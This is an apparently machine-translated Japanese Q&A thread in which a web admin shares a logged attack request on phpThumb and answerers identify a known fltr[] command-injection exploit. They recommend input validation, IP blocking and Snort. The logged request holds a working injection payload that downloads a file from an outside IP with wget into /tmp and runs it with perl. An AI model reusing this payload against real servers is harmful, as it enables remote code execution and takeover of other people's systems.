すべての入力とその他のものをログに記録するエラーログスクリプトを書きました

Question

私は攻撃者からエラーを受けています。彼らは何をしようとしているのですか？ここでは、ログです：

Monday 26th of December 2011 12:10:18 PM 
src=file.jpg&fltr[]=blur| 
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 
91.121.133.22 
| 39757 
| /var/www/class.php 
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 

[SRC = file.jpg] - [FLTR =アレイ] - [phpThumbDebug = 9] -

私は新しい行に領域を分離しました。そのほとんどは入力であり、サーバーポート、IPアドレス、アクセスしたスクリプトがあります。彼らはコマンドラインにアクセスするために悪用しようとしていたようです。しかし、これは彼らが考えるスクリプトではありません。

Answer 1

ウェブサーバーは常に攻撃を受けます。どんな攻撃も特定のプログラムを選んでいる。 あなたのソフトウェアをうまく​​書いて、すべての入力を検証すれば、あなたのシステムはそのようなゴミを許容し、丁寧にそれを無視できるはずです。 1日に3回しか起こっていなければ、DOS攻撃のようなものではありません。 ログをスキャンするスクリプトを書くことができます。攻撃のパターンがわかっている場合は、N個のヒット後にIPアドレスがWebサーバーに到達するのをブロックするスクリプトを実行します。コマンドインジェクションがある

それが表示されます

Answer 2

はphpThumbのFLTR []パラメータに活用

http://www.securityfocus.com/bid/39605/exploit

http://www.juniper.net/security/auto/vulnerabilities/vuln39605.html

Answer 3

すべての攻撃は、同じIPアドレスから発信した場合、あなたはブロックするようにiptablesのを使用することができますそのIPがあなたのサーバーにアクセスするのを防ぎます。スクリプトを書くことで一時的または永続的に行うことができます。 この解決策では、ホストしているサーバーへのroot/sudoアクセス権があると想定しています。 既知の（一般的な）悪用ペイロードや文字列に対しても有効なsnortを探索することができます。

一般的なWebベースの攻撃を防ぐためには、入力の検証が妥当です！